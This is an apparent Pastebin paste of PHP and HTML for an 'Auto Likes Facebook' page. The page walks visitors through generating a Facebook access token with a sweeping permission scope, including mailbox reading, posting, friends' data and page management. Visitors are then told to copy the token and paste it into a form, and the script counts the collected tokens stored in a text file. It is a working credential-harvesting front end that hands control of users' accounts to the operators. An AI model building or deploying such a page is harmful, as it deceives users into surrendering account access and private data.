Advertisement
comelx123

apa saja

Jan 25th, 2014
141
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.39 KB | None | 0 0
  1. <?php
  2. //ganti dgn nama file token ko
  3. $tokenko = "jambul.txt";
  4. $ta = file($tokenko);
  5. $user = count($ta);
  6. ?>
  7. <html>
  8. <head>
  9. <title>Auto Likes Facebook</title>
  10. <link rel="shortcut icon" href="https://s-static.ak.facebook.com/rsrc.php/yi/r/q9U99v3_saj.ico" />
  11. <style>
  12. .masok
  13. {
  14. border:3px red outset;
  15. background-color:white;
  16. color:red;
  17. width:70%;
  18. float:left;
  19. }
  20. .butun
  21. {
  22. border:3px red outset;
  23. background-color:red;
  24. color:white;
  25. float:right;
  26. width:30%;
  27. }
  28. .divi
  29. {
  30. width:70%;
  31. }
  32. .getoken
  33. {
  34. border:3px grey outset;
  35. background-color:blue;
  36. color:white;
  37. float:right;
  38. width:30%;
  39. text-decoration:none;
  40. }
  41. </style>
  42.  
  43. <body style="background-color:black; background-image:url('row.j'); background-size:100% 100%; background-repeat:no;">  
  44. <div class="site">
  45.  
  46. <center style="color: red; font-size:25px;">Your Country is</font>
  47. <?php echo $_SERVER["HTTP_CF_IPCOUNTRY"]; ?>
  48. </center>
  49.  
  50. <center>
  51. <div class="divi">
  52. <br />
  53. <br />
  54. <center>
  55. <table>
  56. <tr>
  57. <td><img src="https://graph.facebook.com/EvilMj.Crew.gov.my/picture?type=normal" alt="me" class="founder-img" width="63px" height="68px" /> </a>
  58. <td><img src="https://graph.facebook.com/crazyhardcore2/picture?type=normal" alt="me" class="founder-img" width="63px" height="68px" /> </a></td>
  59. <td><img src="https://graph.facebook.com/syed.gov.my/picture?type=normal" alt="me" class="founder-img" width="63px" height="68px" /></td>
  60. </tr>
  61. <tr>
  62. <td><iframe src="//www.facebook.com/plugins/follow.php?href=http%3A%2F%2Fwww.facebook.com%2FEvilMj.Crew.gov.my&amp;width&amp;height=21&amp;colorscheme=light&amp;layout=button_count&amp;show_faces=true&amp;appId=1440636066156616" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe></td>
  63. <td><iframe src="//www.facebook.com/plugins/follow.php?href=http%3A%2F%2Fwww.facebook.com%2Fcrazyhardcore2&amp;width&amp;height=21&amp;colorscheme=light&amp;layout=button_count&amp;show_faces=true&amp;appId=1440636066156616" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe></td>
  64. <td><iframe src="https://www.facebook.com/plugins/follow.php?app_id=113869198637480&channel=https%3A%2F%2Fs-static.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D28%23cb%3Df12e60c6052b4c%26domain%3Ddevelopers.facebook.com%26origin%3Dhttps%253A%252F%252Fdevelopers.facebook.com%252Ff3e32261731a71%26relation%3Dparent.parent&href=http%3A%2F%2Fwww.facebook.com%2Fsyed.gov.my&layout=button_count&locale=en_US&sdk=joey&show_faces=true" scrolling="no" frameborder="0" allowtransparency="true" style="border:none; overflow:hidden; width:105px;height: 20px;"> </iframe></td>
  65. </tr>
  66. </table>
  67. </center>
  68. <br />
  69. <form action="home.php" method="get">
  70. <font color="white">
  71. user:<font color="red"><?php
  72. echo $user." ";
  73. ?></font>Accesstoken:</font><br /><input name="token" class="masok">
  74. <button type="submit" class="butun">Submit</button>
  75. </form><br /><a <a class="getoken" target="_blank" href="https://www.facebook.com/dialog/oauth?scope=email,publish_actions,user_about_me,user_actions.books,user_actions.music,user_actions.news,user_actions.video,user_activities,user_birthday,user_education_history,user_events,user_games_activity,user_groups,user_hometown,user_interests,user_likes,user_location,user_notes,user_photos,user_questions,user_relationship_details,user_relationships,user_religion_politics,user_status,user_subscriptions,user_videos,user_website,user_work_history,friends_about_me,friends_actions.books,friends_actions.music,friends_actions.news,friends_actions.video,friends_activities,friends_birthday,friends_education_history,friends_events,friends_games_activity,friends_groups,friends_hometown,friends_interests,friends_likes,friends_location,friends_notes,friends_photos,friends_questions,friends_relationship_details,friends_relationships,friends_religion_politics,friends_status,friends_subscriptions,friends_videos,friends_website,friends_work_history,ads_management,create_event,create_note,export_stream,friends_online_presence,manage_friendlists,manage_notifications,manage_pages,photo_upload,publish_stream,read_friendlists,read_insights,read_mailbox,read_page_mailboxes,read_requests,read_stream,rsvp_event,share_item,sms,status_update,user_online_presence,video_upload,xmpp_login&redirect_uri=http://www.skype.com/copy_this_entire_url/&response_type=token&client_id=260273468396&display=popup">Get Access Token</a>
  76. </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement